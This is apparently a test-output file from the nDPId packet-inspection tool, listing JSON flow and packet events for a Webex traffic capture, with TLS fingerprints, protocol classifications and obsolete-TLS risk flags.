+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640310,"flow_last_seen":1444570640310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640310,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1444570640310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640310,"pkt":"ABoRAAACABoRAAABCABFAAA8S45AAEAGO38KCAABQERpYpETAbtLyIh5AAAAAKACOQgv9gAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1444570640319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAAoAfZAABAGtStARGliCggAAQG7kRO0N3eGS8iIelAS\/\/9pVAAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640319,"flow_last_seen":1444570640319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640319,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1444570640319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAA8c3VAAEAGE5MKCAABQERpZ6GyAbtpybCOAAAAAKACOQjZNwAAAgQFtAQCCAoATMP7AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1444570640330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAAoAfdAABAGtSVARGlnCggAAQG7obKWNk9xacmwj1AS\/\/9YsAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640330,"flow_last_seen":1444570640330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640330,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1444570640330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAA8tGhAAEAGXWUKCAABPm3geMe+AbssX3BwAAAAAKACOQi7XAAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1444570640338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAAoAfhAABAGP+o+beB4CggAAQG7x77ToI+PLF9wcVAS\/\/+9aQAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640338,"flow_last_seen":1444570640338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640338,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1444570640338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAA82ZNAAEAGODoKCAABPm3geMe\/Abvolh2LAAAAAKACOQhSCQAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1444570640344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640344,"pkt":"ABoRAAACABoRAAABCABFAAAoAflAABAGP+k+beB4CggAAQG7x78XaeJ06JYdjFAS\/\/+9aAAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1444570640346,"pkt":"ABoRAAACABoRAAABCABFAABLP\/ZAAEAGY3QKhc4vUEpuRIKzAbsvtI0Fj3ahWYAYAWE\/AgAAAQEICgBMxFRXHeViFQMBABJ8gv9dmaTjHFUtA85jnlaY0C8="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1444570640347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAA0P\/dAAEAGY4oKhc4vUEpuRIKzAbsvtI0cj3ahWYARAWFq6AAAAQEICgBMxFRXHeVi"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1444570640347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAAoAfpAABAG0ZNQSm5ECoXOLwG7grOPdqFZL7SNHVAQ\/\/+mgQAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1444570640348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640348,"pkt":"ABoRAAACABoRAAABCABFAAA8fMFAAEAGd0kKCAABch3Ki7gfAbudV783AAAAAKACOQjtNQAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1444570640356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640356,"pkt":"ABoRAAACABoRAAABCABFAAA8nBlAAEAGTKgKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiEcwAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1444570640365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640365,"pkt":"ABoRAAACABoRAAABCABFAAA8YQpAAEAGkVoKCAABch3MMcncAbvjbaL+AAAAAKACOQiv9QAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1444570640373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640373,"pkt":"ABoRAAACABoRAAABCABFAAA8S49AAEAGO34KCAABQERpYpETAbtLyIh5AAAAAKACOQgvkgAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640382,"flow_last_seen":1444570640382,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640382,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1444570640382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640382,"pkt":"ABoRAAACABoRAAABCABFAAA8O9hAAEAGNk0KCAABUEpuRILnAbv7u\/+DAAAAAKACOQgB2AAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1444570640385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAAoAgBAABAGoDlQSm5ECggAAQG7gucERAB8+7v\/hFAS\/\/9imAAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640385,"flow_last_seen":1444570640385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640385,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1444570640385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAA8smJAAEAGv8IKCAABUEpuRILoAbtZhnY\/AAAAAKACOQgtTwAAAgQFtAQCCAoATMRdAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1444570640389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAAoAgFAABAGoDhQSm5ECggAAQG7guimeYnAWYZ2QFAS\/\/9ilwAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 